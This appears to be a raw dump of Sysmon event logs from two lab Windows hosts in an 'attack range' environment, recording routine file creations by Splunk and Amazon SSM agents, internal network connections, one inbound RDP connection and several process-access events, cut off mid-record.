23542300x8000000000000000286758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.023{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=620020EDBF6E008912FA4928DA4AD555,SHA256=66637B4163317392C83D11A6E23FE30E48BDDF7B3FDAB76B8A31AFF6B94D1FA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:02.653{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51272-false10.0.1.12-8000- 23542300x8000000000000000215675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:05.198{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F156BD28A57512AD91872D5E0B65A46,SHA256=A3F769B286F886660C8E8B1DD8854DBB2EF8F9392D9FAD5FD1A54658117D1C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:05.085{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64044E310156EC508FD182AAB667911F,SHA256=86DD3DD061CD369518125E9F4579D1A0952928735CC3AA2F59E4981B01F3AA59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:06.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83295F43711EECB32F74FC80E30BCCDE,SHA256=D62D33B0C099C99D22A6CAD6E0B6FE2AB3CA8A1E8173839AF988FC462C43BD72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:06.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C57471809C8FFED1C0C5FC5A20F7C2,SHA256=AA32F36FDF705549EEF75D14619E2383AD03BC69B14DC503574023FBF2A87383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:07.229{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C3C3F29F9DEE1055BF69C4F829195C,SHA256=591BC2D9EEC5EE50ACAF58B7B4CB2F61BC9DB017387C9E049C0F8518C3EB0167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:07.825{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-128MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:04.559{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:07.163{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91660999B577D7DCE068649FBF7AF842,SHA256=8DA37FB5F8FF347966930DA35336E1C5FCF8449E62B1CB791B6A6D5854FE6DC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:08.245{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA103A8A7460BFA657F6C8FFFADC6872,SHA256=A1EA3A64F6061569B3AA894B0B909020E8C96803ED8FAC09B11122C5C327E1EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:08.823{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-129MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:08.165{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F9F1101062B54D600FC61837303ADB,SHA256=CBE0A4C32FAC1E9E3A3D074B9E1A312FBAF22FF06DCC0C7037DAB3DC1FBC4A12,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:06.896{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-51392-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000215682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:09.308{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=586905CCFFE1BC9B0EA23338ADF2ADCC,SHA256=71A30CDDFE0429AEEB4A66CAEAA7F362CFC045F390C1C94A1641838A74A08273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:09.308{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26206C008A01AB7B2EA094E1A1494C05,SHA256=746F728E2302DBA06BDF9AB40857ABA4CBD3B4A316959FC25EA288627BB96D58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:09.292{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0058E8C63BA6AA6CFE54F5E8E99DF1,SHA256=2CFED2C4CBA62A4C980F94E5930451CE16CC733AA9B5693FFF415813B7E63173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:09.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA5D3981E5ACA1DFDAE69420DA3270B,SHA256=9E9870F8B14E910D9BF28352FF558D004B860F3DB2828CC9E8DDE04B79CABAD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:10.338{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A6D450913BC5EB8BF1C555297DCC48,SHA256=75D8A4A92C53745BBC08B06276A2996F293CF9B3A82AB8A83C67A586FAE04E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:10.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45E10DF0163C31F4DE1F1BBABB915F41,SHA256=58C29B5A88D702CA688DC6448FD1D772BB7C6A285B53047BAFAF8BC8B9D4B4FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:11.401{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=027DBC7FC65D94562B16995E2590DD6B,SHA256=6D3DF96DB67FD1EE6794D8E2BEFD5C9D61D0C41F81AFD11340AAEC2BBA3654C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:08.637{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51273-false10.0.1.12-8000- 23542300x8000000000000000286780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:11.291{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C248E8F8557514393F59AC9E222D76,SHA256=AA170EDAB009BD8A7350E7BACB6B9F00505275B74B0868A002DC1330C8C01E84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:12.448{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C46603DDAA53623AA0A8ED2CF50C5EB,SHA256=59AFC0313D26033CA4996AA16D9563A921EBAD8AA69CFFA51A34AF2C131FDD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:12.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=357201BEB85085C6F683DA09952BC235,SHA256=420F5C20A4475C8B9C870506913F8A50BB1E926FEC0E51CA54EB4267150C386A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:09.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53358-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:13.682{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5FA222FA600F20B3565487E0CCEA31A,SHA256=0E404B7F94EF54B636E049A4264438DAA806CDB1995F31553AA1990D08AEA953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:13.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E165C61B64F3AA54771E7B45E723F394,SHA256=0A1B4D9F8A44828D8614EE213EBA4DA920C0FD2E6482B7140C4ABEB894238A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:14.729{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8EC87CE793A87F7F5FBCA9F613C1132,SHA256=BD28F1BE50314BC7B71C3AE8A2ED6613BE0868D6FFD6728CB12E820BE816BCCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:14.635{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CA39DB44FF75FE523B8E68E6D6BA482,SHA256=4260A41534C80E552B3B9FF0697FD478216569DB8C2FFF5CF2DB7044E131B6E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:15.854{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=096A2466D8CB8A790FC21996D403EF8F,SHA256=60342E92E80ACE4B5AF89403B201803E3A28264D4F4367C4CC2A48FDF9CC303A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:15.651{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41A70F1487C9BA4D09D714E6030396B5,SHA256=22AE51164B5DF52D65D1398339927801643AC637B2062ED6B52BC669795A8450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:16.901{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC8B58B14225216624337DB507F3F323,SHA256=F60E5CCA28FCCCC599FD9AFDD20D3CED2C48414919939EC2ECE4B5DFC81FD2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:16.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2602EF7A90C28BE07E30796CA7962A7D,SHA256=E84AE0B88D5686EF1160B414BE9A2B214A1B415480104B8452779B4660A22F9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:14.621{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51274-false10.0.1.12-8000- 23542300x8000000000000000215693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:17.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C05F2114C7C7BA865467B82C653A6BA,SHA256=0E684C010962CE127FF53D9AEABBBE21839734DB3484A0D555E22F8EEBD9FAC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:17.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F2A84E99C6D5266FBC983AF970FE84,SHA256=BAEAE6B3D387B690BA1B219F9E1C95BE448A9B38AB3C7C2D9692C4618CF07DEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:18.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3935F81C579E19A8FA01E1FB9C4BDB2,SHA256=D88B30B03203AB7D0C3110581061A37A36567D4F0F80B9E07329D351D2E0B9C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:15.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53359-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000286807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-103F-6216-E604-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-103F-6216-E604-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:19.979{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-103F-6216-E604-000000003802}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 